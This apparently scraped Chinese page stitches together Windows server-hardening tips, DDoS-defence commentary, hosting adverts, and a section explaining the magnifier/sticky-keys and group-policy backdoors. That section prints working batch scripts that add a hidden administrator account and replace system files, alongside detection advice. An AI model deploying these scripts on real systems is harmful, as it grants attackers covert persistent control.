服务器怎么防攻击
在频频恶意攻击用户、系统漏洞层出不穷的今天,作为网络治理员、系统治理员虽然在服务器的安全上都下了不少功夫,诸如及时打上系统安全补丁、进行一些常规的安全配置,但有时仍不安全。因此必须恶意用户入侵之前,通过一些系列安全设置,来将入侵者们挡在“安全门”之外,下面就将我在3A网络服务器上做的一些最简单、最有效的防(Overflow)溢出、本地提供权限攻击类的解决办法给大家分享,小弟亲自操刀,基本没出过安全故障!
一、如何防止溢出类攻击
1尽最大的可能性将系统的漏洞补丁都打完,最好是比如Microsoft Windows Server系列的系统可以将自动更新服务打开,然后让服务器在您指定的某个时间段内自动连接到Microsoft Update网站进行补丁的更新。假如您的服务器为了安全起见 禁止了对公网外部的连接的话,可以用Microsoft WSUS服务在内网进行升级。
2停掉一切不需要的系统服务以及应用程序,最大限能的降底服务器的被攻击系数。比如前阵子的MSDTC溢出,就导致很多服务器挂掉了。其实假如 WEB类服务器根本没有用到MSDTC服务时,您大可以把MSDTC服务停掉,这样MSDTC溢出就对您的服务器不构成任何威胁了。
3启动TCP/IP端口的过滤,仅打开常用的TCP如21、80、25、110、3389等端口;假如安全要求级别高一点可以将UDP端口关闭,当然假如这样之后缺陷就是如在服务器上连外部就不方便连接了,这里建议大家用IPSec来封UDP。在协议筛选中”只答应”TCP协议(协议号为:6)、 UDP协议(协议号为:17)以及RDP协议(协议号为:27)等必需用协议即可;其它无用均不开放。
4启用IPSec策略:为服务器的连接进行安全认证,给服务器加上双保险。如三所说,可以在这里封掉一些危险的端品诸如:135 145 139 445 以及UDP对外连接之类、以及对通读进行加密与只与有信任关系的IP或者网络进行通讯等等。(注:其实防反弹类木马用IPSec简单的禁止UDP或者不常用TCP端口的对外访问就成了,关于IPSec的如何应用这里就不再敖续,可以到服安讨论Search “IPSec”,就 会有N多关于IPSec的应用资料)
二、删除、移动、更名或者用访问控制表列Access Control Lists (ACLs)控制要害系统文件、命令及文件夹:
1黑客通常在溢出得到shell后,来用诸如netexe net1exe ipconfigexe userexe queryexe regeditexe regsvr32exe 来达到进一步控制服务器的目的如:加账号了,克隆治理员了等等;这里可以将这些命令程序删除或者改名。(注重:在删除与改名时先停掉文件复制服务 (FRS)或者先将 %windir%\system32\dllcache\下的对应文件删除或改名。
2也或者将这些exe文件移动到指定的文件夹,这样也方便以后治理员自己使用
3访问控制表列ACLS控制:找到%windir%\system32下找到cmdexe、cmd32exe netexe net1exe ipconfigexe tftpexe ftpexe userexe regexe regeditexe regedt32exe regsvr32exe 这些黑客常用的文件,在“属性”→“安全”中对他们进行访问的ACLs用户进 行定义,诸如只给administrator有权访问,假如需要防范一些溢出攻击、以及溢出成功后对这些文件的非法利用,那么只需要将system用户在 ACLs中进行拒绝访问即可。
4假如觉得在GUI下面太麻烦的话,也可以用系统命令的CACLSEXE来对这些exe文件的Acls进行编辑与修改,或者说将他写成一个bat批处理 文件来执行以及对这些命令进行修改。(具体用户自己参见cacls / 帮助进行)
5对磁盘如C/D/E/F等进行安全的ACLS设置从整体安全上考虑的话也是很有必要的,另外非凡是win2k,对Winnt、Winnt\System、Document and Setting等文件夹。
6进行注册表的修改禁用命令解释器: (假如您觉得用⑤的方法太烦琐的话,那么您不防试试下面一劳永逸的办法来禁止CMD的运行,通过修改注册表,可以禁止用户使用命令解释器 (CMDexe)和运行批处理文件(bat文件)。具体方法:新建一个双字节(REG_DWord)执行 HKEY_CURRENT_USER\Software\PolicIEs\ Microsoft\Windows\System\DisableCMD,修改其值为1,命令解释器和批处理文件都不能被运行。修改其值为2,则只是禁止命令解释器的运行,反之将值改为0,则是打开CMS命令解释器。假如您赚手动太麻烦的话,请将下面的代码保存为reg文件,然后导入。
7对一些以System权限运行的系统服务进行降级处理。(诸如:将Serv-U、Imail、IIS、Php、Mssql、Mysql等一系列以 System权限运行的服务或者应用程序换成其它administrators成员甚至users权限运行,这样就会安全得多了…但前提是需要对这些基本运行状态、调用API等相关情况较为了解 )
不管哪种DDoS攻击,,当前的技术都不足以很好的抵御。现在流行的DDoS防御手段——例如黑洞技术和路由器过滤,限速等手段,不仅慢,消耗大,而且同时也阻断有效业务。如IDS入侵监测可以提供一些检测性能但不能缓解DDoS攻击,防火墙提供的保护也受到其技术弱点的限制。其它策略,例如大量部署服务器,冗余设备,保证足够的响应能力来提供攻击防护,代价过于高昂。
黑洞技术
黑洞技术描述了一个服务提供商将指向某一目标企业的包尽量阻截在上游的过程,将改向的包引进“黑洞”并丢弃,以保全运营商的基础网络和其它的客户业务。但是合法数据包和恶意攻击业务一起被丢弃,所以黑洞技术不能算是一种好的解决方案。被攻击者失去了所有的业务服务,攻击者因而获得胜利。
路由器
许多人运用路由器的过滤功能提供对DDoS攻击的防御,但对于现在复杂的DDoS攻击不能提供完善的防御。
路由器只能通过过滤非基本的不需要的协议来停止一些简单的DDoS攻击,例如ping攻击。这需要一个手动的反应措施,并且往往是在攻击致使服务失败之后。另外,现在的DDoS攻击使用互联网必要的有效协议,很难有效的滤除。路由器也能防止无效的或私有的IP地址空间,但DDoS攻击可以很容易的伪造成有效IP地址。
基于路由器的DDoS预防策略——在出口侧使用uRPF来停止IP地址欺骗攻击——这同样不能有效防御现在的DDoS攻击,因为uRPF的基本原理是如果IP地址不属于应该来自的子网网络阻断出口业务。然而,DDoS攻击能很容易伪造来自同一子网的IP地址,致使这种解决法案无效。
防火墙
首先防火墙的位置处于数据路径下游远端,不能为从提供商到企业边缘路由器的访问链路提供足够的保护,从而将那些易受攻击的组件留给了DDoS攻击。此外,因为防火墙总是串联的而成为潜在性能瓶颈,因为可以通过消耗它们的会话处理能力来对它们自身进行DDoS攻击。
其次是反常事件检测缺乏的限制,防火墙首要任务是要控制私有网络的访问。一种实现的方法是通过追踪从内侧向外侧服务发起的会话,然后只接收“不干净”一侧期望源头发来的特定响应。然而,这对于一些开放给公众来接收请求的服务是不起作用的,比如Web、DNS和其它服务,因为黑客可以使用“被认可的”协议(如HTTP)。
第三种限制,虽然防火墙能检测反常行为,但几乎没有反欺骗能力——其结构仍然是攻击者达到其目的。当一个DDoS攻击被检测到,防火墙能停止与攻击相联系的某一特定数据流,但它们无法逐个包检测,将好的或合法业务从恶意业务中分出,使得它们在事实上对IP地址欺骗攻击无效。
IDS入侵监测
IDS解决方案将不得不提供领先的行为或基于反常事务的算法来检测现在的DDoS攻击。但是一些基于反常事务的性能要求有专家进行手动的调整,而且经常误报,并且不能识别特定的攻击流。同时IDS本身也很容易成为DDoS攻击的牺牲者。
作为DDoS防御平台的IDS最大的缺点是它只能检测到攻击,但对于缓和攻击的影响却毫无作为。IDS解决方案也许能托付给路由器和防火墙的过滤器,但正如前面叙述的,这对于缓解DDoS攻击效率很低,即便是用类似于静态过滤串联部署的IDS也做不到。
DDoS攻击的手动响应
作为DDoS防御一部份的手动处理太微小并且太缓慢。受害者对DDoS攻击的典型第一反应是询问最近的上游连接提供者——ISP、宿主提供商或骨干网承载商——尝试识别该消息来源。对于地址欺骗的情况,尝试识别消息来源是一个长期和冗长的过程,需要许多提供商合作和追踪的过程。即使来源可被识别,但阻断它也意味同时阻断所有业务——好的和坏的。
服务器防攻击怎么防?壹基比小喻来教你们。
一些常见的服务器攻击如木马病毒等都是可以通过平常的安全维护以及防火墙来解决,而不一般的服务器攻击,如三大无解攻击方式:ddos攻击、cc攻击和arp欺骗。这种攻击无法防御,只有使用ddos云防护才能有效防止这些攻击。那么,杭州速联具体说一说服务器防攻击的手段吧。手段一:使用ddos云防护。流量攻击通常是一种十分粗暴的手段,即消耗带宽或者消耗服务器资源或者是不断请求服务器来打垮服务器,以致服务器无法正常运转。当面对这种攻击的时候,唯有ddos云防护能防止此种攻击,将攻击流量引到高防节点上面,以确保源服务器不收攻击的影响。手段二:日常安全维护。另一种服务器攻击方式比较常见,即中了木马病毒等等,比如说今年的“wanna cry”勒索病毒等等。而预防这样的攻击,最好的办法是日常打开防火墙,检查日志,安装安全狗软件、修补漏洞等等。只要有着ddos云防护以及日常安全运维的双重保障,服务器防攻击基本已经做好了,安全还算比较有保障的,一般是不会受到攻击影响的。同时,也要保持一颗平常心,网络攻击偶尔也会遇见的,只要能积极应对解决,就没问题,而不是一味去责怪服务商所给的服务器不给力。杭州速联提供DDOS、CC防御解决服务及方案,无论在流量清洗能力、CC攻击防护能力均处于国内先进水平,提供各类高防服务器租用。
一、修改windows默认的远程端口
也许有高手认为自己做的挺安全的,就算是默认端口也不用被入侵以及被破密。其实修改默认的远程端口一方面是防止入侵,另外一方面也是防止被扫描影响系统的稳定。
有了解过扫描3389软件的人都知道,一般的攻击者都是扫描3389端口的,所以改成其它的端口可以防止被扫描到您的主机。为什么说另外一方面也是防止被扫描3389端口影响到系统的稳定呢?如果您的服务器默认是使用3389端口,扫描软件就会强力尝试密码字典里的密码,与您的主机建议很多的连接,占用系统里的资源导致服务器出现卡的现象。所以修改默认的远程端口是有几个好处的,希望大家重视。
二、修改windows默认的用户名
我们做安全也是针对攻击的行为而制作相对的策略,攻击的人尝试密码破解的时候,都是使用默认的用户名administrator,当你修改了用户名之后,它猜不出您的用户名,即使密码尝试上千万次都不会成功的,如果要使用用户名字典再加下密码字典,我估计攻击者就没有那个心思了,而且也不会一时间破密到您的用户名。所以修改用户名就会减低被入侵的可能。
那么修改成什么样的用户名才是比较安全呢?个人建议使用中文再加上数字再上字母这样的用户名就非常强大了。例如: 非诚勿扰ADsp0973
三、使用复杂的密码
从扫描以及破解的软件看,都是使用简单的常用的密码进行破解的,例如1q2w3e4r5t或者123456或者12345qwert等简单的组合密码,所以使用这些密码是非常不安全的。我个人就建议避免使用简单的密码防止被破解。
建议使用的密码里包含 大字字母+小字字母+数字+特殊字符。 长度至少要12以上这样会好一些。
四、注意以上三点是必然的安全策略,建议还要不定时修改一下用户名与密码,远程端口,扫描病毒这些操作。
维护系统的安全以及业务的稳定运行,这些步骤必不可少,请各位服务器管理员重视,安全不怕做多,就怕做少。这些都是常用的操作维护系统的安全,当然也有其它方面的安全性需要巩固的,做到上面的几点都已经够了,如果系统里的哪些端口以及服务是比较危险的,这个也需要从那个方面去加固一下。
总结:以上是我平常使用的最基本方法,也是最简单的了,希望可以带给大家帮助,谢谢。如何修改远程端口、用户名与密码?这些也是很简单操作就可以的了。如果实在不懂,可以联系下我,谢谢。
一、配置加固
1)限制连续密码错误的登录次数,是对抗密码暴力破解的重要手段;
2)拆分系统管理员的权限,取消超级管理员,从而限制入侵者获取管理员账户时的权限;
3)删除不需要的各种账户,避免被攻击者利用;
4)关闭不需要的服务端口,一是减少攻击者的入侵点,二是避免被入侵者当作后门利用;
5)限制远程登录者的权限,尤其是系统管理权限;
二、合规性加固
比如权限划分
三、反控制加固
比如:掌握控制权、发现隐藏者、监控操作者
景安网络专业的数据中心服务商,值得你托管租用服务器!
ddos防护服务器是HSS对NTPF的访问请求,根据您配置的防护策略进行检测。
如果您配置的防护策略中存在多种常见的防护规则,例如,您可以根据需要配置的精准访问防护规则。配置防护规则后,如果想删除添加的防护规则,请删除原配置的防护规则后重新启用或关闭对应的防护规则。前提条件已完成企业项目管理,并完成购买防护配额。
选择方法
一是类型,DDoS防御分为很多种,比如高防云服务器、高防IP和高防服务器等,可以根据攻击大小和使用习惯选择,区别不大。
二是国内防御价格很贵,其次是香港,美国的防御最便宜(海外DDoS防御服务器避免选择CN2GIA线路)。
三是性能,如果攻击小,为了保障网站服务器的性能,建议选择国内或者香港。
四是防御能力,大型DDoS防御性价比最高的是美国高防服务器,国内防御价格贵,不考虑成本的话,首选国内,其次是香港。
现如今,市面上的绝大多数高防服务器,主要通过实现在“网络层面”和“物理层面”的防护,来帮助用户防御各种网络攻击,并维护服务器自身的安全。
1、网络防御
有一种高防服务器,主要是针对网络防御进行加强的服务器。这类高防服务器,在硬件上与普通的服务器是一样的,只不过在技术上,进行了专门的 IP 隐藏设计,使得外界的攻击没有办法直接攻击到该服务器,这也是一种很有效的防御措施和原理。
2、物理防御
一般来说,我们通常所接触到的高防服务器,指的都是物理防御,也就是直接在服务器的硬件上面,增加了一层硬件防火墙。这样的硬件防火墙,无疑就像是服务器一层厚重的“盔甲”,可以起到非常良好的防御作用。所以一般默认的高防服务器,就是这类添加“硬件防火墙”进行物理防御的高防服务器。这种高防服务器,能够使得通过在物理硬件层面的加持,让用户享受到更加安全、良好和显著的防御效果。
但绝对不能容忍的是,服务器被植入后门,攻击者如入无人之境,而管理者去浑然不觉。本文将对当前比较流行的后门技术进行解析,知己知彼方能杜绝后门。
1、放大镜后门 放大镜(magnifyexe)是Windows 2000/XP/2003系统集成的一个小工具,它是为方便视力障碍用户而设计的。在用户登录系统前可以通过“Win+U”组合键调用该工具,因此攻击者就用精心构造的magnifyexe同名文件替换放大镜程序,从而达到控制服务器的目的。 通常情况下,攻击者通过构造的magnifyexe程序创建一个管理员用户,然后登录系统。当然有的时候他们也会通过其直接调用命令提示符(cmdexe)或者系统shell(explorerexe)。需要说明的是,这样调用的程序都是system权限,即系统最高权限。不过,以防万一当管理员在运行放大镜程序时发现破绽,攻击者一般通过该构造程序完成所需的操作后,最后会运行真正的放大镜程序,以蒙骗管理员。其利用的方法是: (1)构造批处理脚本 @echo off
net user gslw$ test168 /add
net localgroup administrators gslw$ /add
%Windir%system32 agnifyexe
exit 将上面的脚本保存为magnifybat,其作用是创建一个密码为test168的管理员用户gslw$,最后运行改名后的放大镜程序nagnifyexe。(图1)
(2)文件格式转换 因为批处理文件magnifybat的后缀是bat,必须要将其转换为同名的exe文件才可以通过组合键Win+U调用。攻击者一般可以利用WinRar构造一个自动解压的exe压缩文件,当然也可以利用bat2com、com2exe进行文件格式的转换。我们就以后面的方法为例进行演示。 打开命令行,进入bat2com、com2exe工具所在的目录,然后运行命令“bat2com magnifybat”将magnifybat转换成magnifycom,继续运行命令“com2exe magnifycom”将magnifycom转换成magnifyexe,这样就把批处理文件转换成和放大镜程序同名的程序文件。(图2)(3)放大镜文件替换 下面就需要用构造的magnifyexe替换同名的放大镜程序文件,由于Windows对系统文件的自我保护,因此不能直接替换,不过Windows提供了一个命令replaceexe,通过它我们可以替换系统文件。另外,由于系统文件在%Windir%system32dllcache中有备份,为了防止文件替换后又重新还原,所有我们首先要替换该目录下的magnifyexe文件。假设构造的magnifyexe文件在%Windir%目录下,我们可以通过一个批处理即可实现文件的替换。 @echo off
copy %Windir%system32dllcachemagnifyexe nagnifyexe
copy %Windir%system32magnifyexe nagnifyexe
replaceexe %Windir%magnifyexe %Windir%system32dllcache
replaceexe %Windir%magnifyexe %Windir%system32
exit 上面批处理的功能是,首先将放大镜程序备份为nagnifyexe,然后用同名的构造程序将其替换。(图3)
(4)攻击利用 当完成上述操作后,一个放大镜后门就做成了。然后攻击者通过远程桌面连接服务器,在登录界面窗口摁下本地键盘的“Win+U”组合键,选择运行其中的“放大镜”,此刻就在服务器上创建了一个管理员用户gslw$并打开了放大镜工具,然后攻击者就开业通过该帐户登录服务器。当然,攻击者在断开登录前会删除所有与该帐户相关的信息,以防被管理员发现。(图4) (5)防范措施 进入%Windir%system32查看magnifyexe的文件图标是否是原来的放大镜的图标,如果不是的话极有可能被植入了放大镜后门。当然,有的时候攻击者也会将其文件图标更改为和原放大镜程序的图标一样。此时我们可以查看magnifyexe文件的大小和修改时间,如果这两样有一项不符就比较怀疑了。我们也可以先运行magnifyexe,然后运行lusrmgrmsc查看是否有可疑的用户。如果确定服务器被放置了放大镜后门,首先要删除该文件,然后恢复正常的放大镜程序。当然,我们也可以做得更彻底一些,用一个无关紧要的程序替换放大镜程序。甚至我们也可以以其人之道还治其人之身,构造一个magnifyexe,通过其警告攻击者或者进行入侵监控和取证。 补充:与放大镜后门类似的还有“粘滞键”后门,即按下SHIEF键五次可以启动粘滞键功能,其利用和防范措施与放大镜后门类似,只是将magnifyexe换成了sethcexe。 2、组策略后门 相对来说,组策略后门更加隐蔽。往册表中添加相应键值实现随系统启动而运行是木马常用的伎俩,也为大家所熟知。其实,在最策略中也可以实现该功能,不仅如此它还可以实现在系统关机时进行某些操作。这就是通过最策略的“脚本(启动/关机)”项来说实现。具体位置在“计算机配置→Windows设置”项下。因为其极具隐蔽性,因此常常被攻击者利用来做服务器后门。 攻击者获得了服务器的控制权就可以通过这个后门实施对对主机的长期控制。它可以通过这个后门运行某些程序或者脚本,最简单的比如创建一个管理员用户,他可以这样做: (1)创建脚本 创建一个批处理文件addbat,addbat的内容是:@echo off & net user gslw$ test168 /add && netlocalgroup administrators gslw$ /add & exit (创建一个用户名为gslw$密码为test168的管理员用户)。 (2)后门利用 在“运行”对话框中输入gpeditmsc,定位到“计算机配置一>Windows设置一>脚本(启动/关机)”, 双击右边窗口的“关机”,在其中添加addbat。就是说当系统关机时创建gslw$用户。对于一般的用户是根本不知道在系统中有一个隐藏用户,就是他看见并且删除了该帐户,当系统关机时又会创建该帐户。所以说,如果用户不知道组策略中的这个地方那他一定会感到莫名其妙。 其实,对于组策略中的这个“后门”还有很多利用法,攻击者通过它来运行脚本或者程序,嗅探管理员密码等等。当他们获取了管理员的密码后,就不用在系统中创建帐户了,直接利用管理员帐户远程登录系统。因此它也是“双刃剑”,希望大家重视这个地方。当你为服务器被攻击而莫名其妙时,说不定攻击者就是通过它实现的。(图5)(3)后门防范 组策略后门是攻击者利用了管理员的疏忽心理,因为对于组策略中的“(启动/关机)脚本”项往往被大家忽略,有些管理员甚至不知道组策略中的这个选项。防范这类服务器后门,也非常简单,只需打开组策略工具,定位到“脚本(启动/关机)”项下进行查看。当然也可以进入 system32GroupPolicyMachineScriptsStartup和system32GroupPolicyMachineScriptsShutdown目录检查是否有可疑的脚本。
0条评论